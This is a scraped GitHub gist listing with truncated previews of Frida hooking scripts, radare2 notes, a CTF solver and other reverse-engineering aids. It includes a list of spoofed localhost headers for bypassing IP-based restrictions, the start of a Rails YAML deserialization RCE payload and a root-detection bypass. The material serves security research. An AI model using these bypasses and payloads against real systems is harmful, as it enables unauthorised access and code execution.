Skip to content

Instantly share code, notes, and snippets.

View Hamz-a's full-sized avatar

Hamza Hamz-a

225 followers · 158 following
View GitHub Profile
@eybisi
eybisi / hook_dexloader.js
Last active October 28, 2023 19:16
frida script for hooking loaded classes with the help of dexclassloader init
Java.perform(function(){
let ThreadDef = Java.use('java.lang.Thread');
let ThreadObj = ThreadDef.$new();
function stackTrace() {
console.log('------------START STACK---------------')
let stack = ThreadObj.currentThread().getStackTrace();
for (let i = 0; i < stack.length; i++) {
console.log(i + ' => ' + stack[i].toString());
}
console.log('------------END STACK---------------');
@yehgdotnet
yehgdotnet / gist:ec6ae948a6735d66f6eaff2ef60649a3
Last active August 24, 2023 17:30
Bypass IP-based restriction through spoofed localhost header
X-Azure-ClientIP: 127.0.0.1
X-Azure-SocketIP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Target-IP: 127.0.0.1
X-Forwarded-Host: localhost
True-Client-IP: 127.0.0.1
@Areizen
Areizen / uninstall.py
Last active July 23, 2020 18:40
Uninstall Device administrator applications
#!/usr/bin/python3
import frida
import subprocess
import sys
if len(sys.argv) !=2:
print(f"[-] Usage : python3 {sys.argv[0]} <package_to_uninstall>")
sys.exit(-1)
def message(message, data):
@daniellimws
daniellimws / frida-tips.md
Last active April 5, 2024 21:56
Frida tips

Frida Tips

The documentation is so limited. A compilation of things I found on StackOverflow and don't want to have to search it up again.

Bypass root check

setTimeout(function() { // avoid java.lang.ClassNotFoundException

  Java.perform(function() {

    // Root detection bypass example
@niklasb
niklasb / railspwn.rb
Last active March 7, 2021 12:14
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
@FrankSpierings
FrankSpierings / hookalloverloads.js
Created October 14, 2017 18:57
Hook all overloads - Java/Android - Frida
function getGenericInterceptor(className, func, parameters) {
args = []
for (i = 0; i < parameters.length; i++) {
args.push('arg_' + i)
}
var script = "result = this.__FUNCNAME__(__SEPARATED_ARG_NAMES__);\nlogmessage = '__CLASSNAME__.__FUNCNAME__(' + __SEPARATED_ARG_NAMES__ + ') => ' + result;\nconsole.log(logmessage);\nreturn result;"
script = script.replace(/__FUNCNAME__/g, func);
script = script.replace(/__SEPARATED_ARG_NAMES__/g, args.join(', '));
script = script.replace(/__CLASSNAME__/g, className);
@mommi84
mommi84 / awesome-kge.md
Last active March 9, 2024 16:38
Awesome Knowledge Graph Embedding Approaches

Awesome Knowledge Graph Embedding Approaches

Awesome

This list contains repositories of libraries and approaches for knowledge graph embeddings, which are vector representations of entities and relations in a multi-relational directed labelled graph. Licensed under CC0.

Libraries

@LiveOverflow
LiveOverflow / zwiebel.py
Created October 8, 2016 08:35
TUM CTF 2016
import sys
import r2pipe
r2 = r2pipe.open("./zwiebel2")
r2.cmd("e dbg.profile=zwiebel.rr2")
r2.cmd("doo") # reopen for debugging
r2.cmd("db 0x400875") # set breakpoint at `call r14`
r2.cmd("dc") # continue until breakpoint is hit
def step():
@oleavr
oleavr / load-cycript.js
Last active February 18, 2019 13:15
Frida script to load Cycript into an arbitrary process (workaround for sandboxing issues)
'use strict';
/*
* Usage:
* $ frida -U -n Twitter -l load-cycript.js
*/
var PORT = 27060;
dlopen('/usr/lib/libcycript.dylib');
@williballenthin
williballenthin / yet another radare2 cheatsheet.md
Last active April 20, 2024 23:27

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main